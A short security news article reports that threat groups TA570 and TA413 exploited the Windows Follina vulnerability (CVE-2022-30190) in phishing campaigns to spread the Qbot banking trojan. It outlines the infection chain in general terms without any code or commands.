Hackers are now abusing the Follina flaw to spread the Qbot malware

June 13, 2022
Hackers Follina Flaw Qbot Malware Infostealer Banking Trojan Windows Vulnerability

From the earlier reports about a newly discovered zero-day vulnerability affecting Windows OS, tracked Follina (CVE-2022-30190), security experts had been reporting to have seen threat operators abuse the flaw via phishing attacks to spread the Qbot malware.

Included in the recent bug exploit was the TA413 threat group targeting the Tibetan diaspora. Furthermore, the TA570 threat group was also seen abusing the zero-day flaw to infect their targets with Qbot.

The ongoing phishing campaign that abuses the Follina flaw involves threat operators using hacked email thread messages with HTML attachments to download ZIP files. Upon opening the ZIP files, the victims will see IMG disks holding DLL, Word, and other shortcut files.

The shortcut files included in the IMG disks directly load the Qbot DLL file on the victims’ machines. Meanwhile, the blank Word document will contact an external server to load another HTML file that exploits Follina to run PowerShell code that will download and launch another Qbot DLL payload.

 

From an in-depth investigation, analysts have discovered that the tactics used in the phishing campaign to spread the Qbot malware match the tactics of the TA570 threat group.

 

TA570, a Qbot-affiliate group, used two different tactics to infect their victims to hint at running testing campaigns to see which tactic would be more effective.

According to researchers, many Qbot affiliates are known for switching their vectors of attack, including one from February, where hackers have turned to an old tactic called Squiblydoo to spread Qbot malware through MS Office files using regsvr32[.]exe.

The malware in this narrative comes with several other names, such as Pinkslipbot, Qakbot, and Quakbot. Qbot malware is a banking trojan and infostealer that affects Windows with worming features to infect more devices within a compromised network. Moreover, it could execute brute-force attacks on Active Directory administrator accounts.

Many hackers also utilise Qbot to steal data from its victims, including banking credentials and personal information. Additionally, some of the most notorious ransomware gangs like Revil and Egregor have also used the malware in their operations to launch initial access into corporate networks.

About the author